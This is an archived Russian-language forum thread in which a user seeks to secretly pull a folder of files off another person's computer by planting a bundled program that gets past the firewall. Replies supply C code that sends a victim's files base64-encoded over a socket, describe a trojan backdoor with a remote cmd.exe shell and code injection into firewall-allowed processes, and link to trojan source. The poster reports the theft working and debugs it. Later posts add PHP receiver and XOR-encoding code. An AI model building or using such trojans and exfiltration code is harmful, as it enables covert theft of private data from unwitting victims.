Просмотр полной версии : Слив инфы с чужого компа
Надо у одного чудака с компа слить себе папку с важными файлами через интернет (иначе нельзя). Есть возможность внедрить ему прогу, приклеенную к другой. С бекдором можно попробовать, но у него наверняка блокированы порты. Как решить эту задачу? Может, кто уже писал что-то подобное?
Был вариант как-то паковать, кодировать (типа Base64) и передавать постом на бесплатный хостинг.
1. Какие есть еще варианты?
2. Как скрипту (желательно php) получить файл и сохранить на сервере (есть стандартные средства или надо самому все писать?)
3. Если прийдется кодировать/раскодировать в Base64, как это сделать на php?
С заливной частью, думаю, проблем не будет.
большая папка?
нельзя сжать её rar-ом / zip-ом - чтобы один файл, а не папка вышла
и потом выслать архив на ящик.
незнаю что там да как
но вроде ты усложняешь сильно всё.
у него там сервер что-ли? как у него на компе php выполняться будит?
больше инфы давай
Жора
Нормально он все объяснил
vvs777
Я так понимаю, Вас интересуют способы обхода фаервола.
Если у Вас есть навоки в программировании, обратите внимание на эту тему: http://www.security-teams.net/index.php?showtopic=3059.
Там в сорсах траяна можно обнаружить файл FuckFirewall.cpp - это то, что Вам нужно.
По поводу скачивания в Base64 - думаю администрация не сильно обидится, если я немного насорю
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);
if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}
int Size = GetFileSize(hFile, 0);
HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;
wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}
GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
// base64.h
HANDLE B64EncodeAlloc(int BuffSize);
_stdcall B64CryptOneBlock(void* Block);
void B64Encode(void* hMem, int MemSize, void* hDest);
Функци base64 кодирования написаны на асме и занимают много метса, я залил их сюда:
https://drmist.ru/download/base64.cpp
Всего этого должно Вам хватить, чтобы собрать несложный троян со всеми необходимыми функциями.
Разумеется, если вы знаете, что делать с исходниками на C++ :(
паренёк нас рассудит...реально вы сильно заморочились.
До сих пор вижу такие посты - честно скажу, смеюсь.
#FUCK_FIREWALL - действительно тема. Наверное прокатит на Outpost 0.01 demo...
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);
if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}
int Size = GetFileSize(hFile, 0);
HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;
wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}
GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
Код обалденный... Сверх приватный и нужный...
Функци base64 кодирования написаны на асме и занимают много метса, я залил их сюда:
https://drmist.ru/download/base64.cpp
Да, много места, но всеже не столь много чтобы их нельзя было вынуть из OpenSSH для FreeBSD...
B64.CPP
/*
From openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.c
*/
/* original header */
/* $OpenBSD: base64.c,v 1.3 1997/11/08 20:46:55 deraadt Exp $ */
/*
* Copyright (c) 1996 by Internet Software Consortium.
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS
* ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE
* CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
* DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
* PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
* ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
* SOFTWARE.
*/
/*
* Portions Copyright (c) 1995 by International Business Machines, Inc.
*
* International Business Machines, Inc. (hereinafter called IBM) grants
* permission under its copyrights to use, copy, modify, and distribute this
* Software with or without fee, provided that the above copyright notice and
* all paragraphs of this notice appear in all copies, and that the name of IBM
* not be used in connection with the marketing of any product incorporating
* the Software or modifications thereof, without specific, written prior
* permission.
*
* To the extent it has a right to do so, IBM grants an immunity from suit
* under its patents, if any, for the use, sale or manufacture of products to
* the extent that such products are used for performing Domain Name System
* dynamic updates in TCP/IP networks by means of the Software. No immunity is
* granted for any product per se or for any other function of any product.
*
* THE SOFTWARE IS PROVIDED "AS IS", AND IBM DISCLAIMS ALL WARRANTIES,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
* PARTICULAR PURPOSE. IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL,
* DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING
* OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE, EVEN
* IF IBM IS APPRISED OF THE POSSIBILITY OF SUCH DAMAGES.
*/
#include <winsock.h>
//#define Assert(Cond) if (!(Cond)) abort()
#define Assert(Cond) //
static const char Base64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";
static const char Pad64 = '=';
int Base64_Decode( char const *src, u_char *target, size_t targsize )
{
int tarindex, state, ch;
char *pos;
state = 0;
tarindex = 0;
while ((ch = *src++) != '\0')
{
if (isspace( ch )) continue;
if (ch == Pad64) break;
pos = strchr( Base64, ch );
if (pos == 0) return (-1);
switch (state)
{
case 0:
if (target)
{
if (tarindex >= targsize) return (-1);
target[tarindex] = (pos - Base64) << 2;
}
state = 1;
break;
case 1:
if (target)
{
if (tarindex + 1 >= targsize) return (-1);
target[tarindex] |= (pos - Base64) >> 4;
target[tarindex+1] = ((pos - Base64) & 0x0f)
<< 4 ;
}
tarindex++;
state = 2;
break;
case 2:
if (target)
{
if (tarindex + 1 >= targsize) return (-1);
target[tarindex] |= (pos - Base64) >> 2;
target[tarindex+1] = ((pos - Base64) & 0x03) << 6;
}
tarindex++;
state = 3;
break;
case 3:
if (target)
{
if (tarindex >= targsize) return (-1);
target[tarindex] |= (pos - Base64);
}
tarindex++;
state = 0;
break;
}
}
if (ch == Pad64)
{
ch = *src++;
switch (state)
{
case 0:
case 1: return (-1);
case 2:
for (; ch != '\0'; ch = *src++)
if (!isspace( ch )) break;
if (ch != Pad64) return (-1);
ch = *src++;
case 3:
for (; ch != '\0'; ch = *src++)
if (!isspace( ch )) return (-1);
if (target && target[tarindex] != 0) return (-1);
}
}
else
{
if (state != 0) return (-1);
}
return (tarindex);
}
int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize )
{
size_t datalength = 0;
u_char input[3];
u_char output[4];
int i;
while (2 < srclength)
{
input[0] = *src++;
input[1] = *src++;
input[2] = *src++;
srclength -= 3;
output[0] = input[0] >> 2;
output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
output[3] = input[2] & 0x3f;
Assert( output[0] < 64 );
Assert( output[1] < 64 );
Assert( output[2] < 64 );
Assert( output[3] < 64 );
if (datalength + 4 > targsize) return (-1);
target[datalength++] = Base64[output[0]];
target[datalength++] = Base64[output[1]];
target[datalength++] = Base64[output[2]];
target[datalength++] = Base64[output[3]];
}
if (0 != srclength)
{
input[0] = input[1] = input[2] = '\0';
for (i = 0; i < srclength; i++) input[i] = *src++;
output[0] = input[0] >> 2;
output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
Assert( output[0] < 64 );
Assert( output[1] < 64 );
Assert( output[2] < 64 );
if (datalength + 4 > targsize) return (-1);
target[datalength++] = Base64[output[0]];
target[datalength++] = Base64[output[1]];
if (srclength == 1) target[datalength++] = Pad64;
else
target[datalength++] = Base64[output[2]];
target[datalength++] = Pad64;
}
if (datalength >= targsize) return (-1);
target[datalength] = '\0';
return (datalength);
}
B64.H
/*
(C) KEZ
*/
// from openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.h
#ifndef _BASE64_H_INCLUDED_
#define _BASE64_H_INCLUDED_
// like php style
extern int Base64_Decode( char const *src, u_char *target, size_t targsize );
extern int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize );
#endif // _BASE64_H_INCLUDED_
долой кодинг! даешь кантер страйг!
kez
Меня не покидает чувство, что у Вас ко мне некого рода личная неприязнь )))
Или просто от прероды желание всех кругом опустить.
Предлогаю Вам написать что-нибудь свое и ставте туда хоть компоненты дельфовските, хоть чужой алгоритм (имхо не самой лучшей реализации). Степень приватности и нужности выберете самостоятельно. ;)
Ой как все запущено...
Во первых я хорошо шарю в делфи но не в сях. За ссылки спасибо, пригодятся.
Я имел в виду что прога посылает файл на хостинг, на котором висит php скрипт.
Че-то меня бейс64 заломал сразу. Буду слать в виде =45=64=97... так легче кодить-декодить. Думал, есть в php стандартная функция как полученный в параметрах файл сохранить на диске. Слышал, что такая есть, но не видел как ее юзать.
vvs777
1) В чем заключается проблема перевода из си в дельфи? могу попробовать объяснить - это не сложно.
2) Зачем =AA=BB=CC...., Если можно AABBCC...? кроме того, php прекрасно декодирует base64 - а данных передаваться будет значительно меньше, чем в hex'е.
3) Вы когда-нибудь заливали что-нить на webfile.ru? Это делается через специальный пост запрос. При этом файл сохраняется на сервере в /tmp, а скрипту передается параметр $_FILE["имя_переменной_в_пост_запро се"]. Это переменная - ассоциати(ви? - как правильно? )) )рованный двумерный массив, $_FILE[..]["size"] - размер файла, $_FILE[..]["error"] - код ошибки, $_FILE[..]["tmp_name"] - имя файла на сервере. Остается только скопировать его из /tmp куда вам нужно.
Что относительно программы - она должна послать специальный пост-запрос (http://rfc.net/rfc2388.html - multipart/form-data). Вобще по ключевым словам "сокеты, multipart/form-data, POST" можно найти хорошее описание на русском.
Но лично я поступил бы так:
написал бекдур, запущенный на 2-х портах:
на первом - перенапревленный ввод/вывод из cmd.exe,
на втором - протокол такой: я шлю полный путь к файлу, троян отсылает его в base64. (а можно и вобще никак не закодированный или даже упакованный)
Написать клиент (если netcat кажется неудобным) не составит труда.
Я недавно нарвался на пидерский комп кде мой трой не сработал потому, что порты перекрыты и еще и ход из всей сети через 1 ящик.
Сейчас мне это срочно надо сделать до четверга. Ошибки быть не должно.
Прога должна все делать сама. Может и Бейс сделаю.
Ps: Внедпрение в адресное пространство разрешенных файрволами прог - рулит.
Пока проблема - поток в библиотеке прерывается при закрытии программы, а должен завершиться культурно.
Короче сделал.
Только вот лажа. Текстовые вообще шлются без проблем. Послал xls (EXEL).
Скачал по фтп. Размер совпадает, но не открывается.
Прописал FC /B file.xls file_dn.xls и получил длинный лист
00000008: 00 20
00000009: 00 20
0000000A: 00 20
0000000B: 00 20
0000000C: 00 20
0000000D: 00 20
0000000E: 00 20
0000000F: 00 20
00000010: 00 20
(Везде где были 00 стало 20)
Как с этим бороться?
Из-за способа передачи - шли двоичный или текстовый. Type I - Type A
В смысле?
Я и так все в двоичном шлю. И текст в том числе. Чтоб не морочить голову.
пока работает вариант с представлением в виде Hex кода и отправки этой хренотени, но объем 2х.
попробуй это, при желании можно исправить, у меня просто нет времени и желания
xoft похож на base64 но ключевой
надыбал из движка платежки енкрипт,а декрипт писал сам, поэтому различаются стили..:) ногами не бейте
<?php
function changedatain($plain_data,$key){
// encode plain data with key using xoft encryption
$key_length=0; //key length counter
$all_bin_chars="";
$cipher_data="";
for($i=0;$i<strlen($plain_data);$i++){
$p=substr($plain_data,$i,1); // p = plaintext
$k=substr($key,$key_length,1); // k = key
$key_length++;
if($key_length>=strlen($key)){
$key_length=0;
}
$dec_chars=ord($p)^ord($k);
$dec_chars=$dec_chars + strlen($key);
$bin_chars=decbin($dec_chars);
while(strlen($bin_chars)<8){
$bin_chars="0".$bin_chars;
}
$all_bin_chars=$all_bin_chars.$bin_chars;
}
$m=0;
for($j=0;$j<strlen($all_bin_chars);$j=$j+4){
$four_bit=substr($all_bin_chars,$j,4); // split 8 bit to 4 bit
$four_bit_dec=bindec($four_bit);
$decimal_value=$four_bit_dec * 4 + $m; //multiply by 4 plus m where m=0,1,2, or 3
$base64_value=dectobase64($decimal_value); //convert to base64 value
$cipher_data=$cipher_data.$base64_value;
$m++;
if($m>3){
$m=0;
}
}
return $cipher_data;
}
function dectobase64($decimal_value){
// convert decimal value into base64 value
switch($decimal_value){
case 0: $base64_value="A";break;
case 1: $base64_value="B";break;
case 2: $base64_value="C";break;
case 3: $base64_value="D";break;
case 4: $base64_value="E";break;
case 5: $base64_value="F";break;
case 6: $base64_value="G";break;
case 7: $base64_value="H";break;
case 8: $base64_value="I";break;
case 9: $base64_value="J";break;
case 10: $base64_value="K";break;
case 11: $base64_value="L";break;
case 12: $base64_value="M";break;
case 13: $base64_value="N";break;
case 14: $base64_value="O";break;
case 15: $base64_value="P";break;
case 16: $base64_value="Q";break;
case 17: $base64_value="R";break;
case 18: $base64_value="S";break;
case 19: $base64_value="T";break;
case 20: $base64_value="U";break;
case 21: $base64_value="V";break;
case 22: $base64_value="W";break;
case 23: $base64_value="X";break;
case 24: $base64_value="Y";break;
case 25: $base64_value="Z";break;
case 26: $base64_value="a";break;
case 27: $base64_value="b";break;
case 28: $base64_value="c";break;
case 29: $base64_value="d";break;
case 30: $base64_value="e";break;
case 31: $base64_value="f";break;
case 32: $base64_value="g";break;
case 33: $base64_value="h";break;
case 34: $base64_value="i";break;
case 35: $base64_value="j";break;
case 36: $base64_value="k";break;
case 37: $base64_value="l";break;
case 38: $base64_value="m";break;
case 39: $base64_value="n";break;
case 40: $base64_value="o";break;
case 41: $base64_value="p";break;
case 42: $base64_value="q";break;
case 43: $base64_value="r";break;
case 44: $base64_value="s";break;
case 45: $base64_value="t";break;
case 46: $base64_value="u";break;
case 47: $base64_value="v";break;
case 48: $base64_value="w";break;
case 49: $base64_value="x";break;
case 50: $base64_value="y";break;
case 51: $base64_value="z";break;
case 52: $base64_value="0";break;
case 53: $base64_value="1";break;
case 54: $base64_value="2";break;
case 55: $base64_value="3";break;
case 56: $base64_value="4";break;
case 57: $base64_value="5";break;
case 58: $base64_value="6";break;
case 59: $base64_value="7";break;
case 60: $base64_value="8";break;
case 61: $base64_value="9";break;
case 62: $base64_value="+";break;
case 63: $base64_value="/";break;
case 64: $base64_value="=";break;
default: $base64_value="a";break;
}
return $base64_value;
}
function base64todec($decimal_value){
$base64_value=97;
if ((ord($decimal_value) > 64) && (ord($decimal_value) < 91)) $base64_value=ord($decimal_value)-65;
if ((ord($decimal_value) > 96) && (ord($decimal_value) < 123)) $base64_value=ord($decimal_value)-71;
if ((ord($decimal_value) > 47) && (ord($decimal_value) < 58)) $base64_value=ord($decimal_value)+4;
if ($decimal_value == "+") $base64_value=62;
if ($decimal_value == "/") $base64_value=63;
if ($decimal_value == "=") $base64_value=64;
return $base64_value;
}
function decr($plain_data,$key) {
$m = 0;
$bin = "";
$result = "";
for($i=0;$i<strlen($plain_data);$i++){
$p=substr($plain_data,$i,1);
$c=base64todec ($p);
$c=($c-$m)/4;
$m++;
if ($m>3) $m=0;
$b = decbin($c);
while(strlen($b)<4) $b="0".$b;
$bin .= $b;
}
$m = 0;
for($j=0;$j<strlen($bin);$j=$j+8){
$bit_8=substr($bin,$j,8);
$c = bindec($bit_8) - strlen($key);
$k=substr($key,$m,1); // k = key
$m++;
if ($m==strlen($key)) $m=0;
$res=($c^ord($k));
$result .= chr($res);
}
return $result;
}
/*echo
echo changedatain("56435168",changeme)."<br>";
echo decr("U5abU1aXUpWzYNaX",changeme);
//4613213468735121354
*/
$f = file ("nums.txt");
foreach ($f as $c) {
echo decr(trim($c),changeme)."<br>";
}
?>
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot